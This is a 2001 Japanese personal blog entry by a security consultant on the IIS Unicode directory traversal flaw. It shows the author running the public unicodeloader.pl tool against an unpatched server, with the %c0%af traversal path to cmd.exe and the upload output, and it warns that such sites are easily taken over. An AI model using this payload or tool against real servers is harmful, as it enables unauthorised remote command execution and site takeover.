2001年01月26日(金) << 前の日記 | 次の日記 >>
これまでの01月26日 編集

■1 shell on IIS server with Unicode using *only* HTTP[http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26threads%3D0%26end%3D2001-01-27%26list%3D1%26mid%3D158336%26start%3D2001-01-21%26][セキュリティ]次の記事 >> このエントリーをはてなブックマークに追加

セキュリティホール memo[http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/01.html#20010125_iis] から。
この忙しいのに,パッチあてなきゃいけないお客さんがいるなぁ。 早く,FreeBSDに移行させねば。

実験してみた。:

パッチをあてていないサイトだと,
kei@xxxxx[205] ./unicodeloader.pl www.XXXXX.co.jp:80 'c:\InetPub\wwwroot'


Creating uploading webpage on www.XXXXX.co.jp on port 80.
The webroot is c:\InetPub\wwwroot.

testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: C:\Inetpub\scripts
sensepost.exe not found - lets copy it quick
uploading ASP section:
..............
uploading the INC section: (this may take a while)
................................................................................
................................................................................
........................
upload page created.

Now simply surf to www.XXXXX.co.jp/upload.asp and enjoy.
Files will be uploaded to c:\InetPub\wwwroot
なんて具合にいとも簡単に乗っ取れてしまいます。 後は,怪しいツールをインストールするなりページを書き換えるなりご自由にの状態になります。 wwwrootの物理位置を知る必要があるとは言っても, 多くのサイトはc:\InetPub\wwwrootでしょうから,ほとんど障壁になりません。 これはまずいな。

■ 関連記事

■2業界人脈半径は2hop<< 前の記事 このエントリーをはてなブックマークに追加

らしい。某MLで離れて久しい知人と会ってびっくり。 お互い業界(どの?)にいるとはいえ,もともと参加者そう多くも無いMLなので, やっぱり驚くですよ。
実はディープなユーザ密度が高いのかな [http://www.jp.freebsd.org/ml.html#isp-jp]

■ 関連記事

以上、1 日分です。

指定日の日記を表示

前月 2001年01月 翌月
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31

最近の日記

2019年04月01日

新元号「令和」について

2019年03月23日

DXアンテナ ワイヤレスチューナー メディアコンセント DMC10F1

2019年02月17日

#例のグラボを活用する

2019年01月03日

シリーズ5・myHomeAlexaで自分のCDをかける

2018年12月25日

シリーズ4・英語の楽曲・アルバム・アーティスト名をカタカナに直す

2018年12月23日

シリーズ3: Echo Dotがやってきた

2018年12月19日

続・Echo Dotがやってきた

分野別タイトル一覧


全て
CLIP
SYA!nikki
book
freebsd
hns
magic
おさけ
おしごと
お買いもの
ぐる
ごはん
アクセシビリティ
オープンソース
セキュリティ
音楽
地域情報化
電子自治体
日記

keikuma on Twitter

keikuma Name:前田勝之
Location:長崎市
Web:http://www.nantok...
Bio:前田勝之(まえだかつゆき)。長崎在住。コンサル、SE、プログラマー、 なんとか株式会社代表、非常勤講師(情報セキュリティ)。 セキュアド、テクニカルエンジニア(SV,NW)。サーバ管理とWeb日記を10年ほど。 ネットとリアルの接点に関心あり。食べること・歌うこと・愛すること・作ること・飲むこと。おいしいものがぜんぶすき。

サイト内検索

Google AdSense

Powered by hns-2.19.9, HyperNikkiSystem Project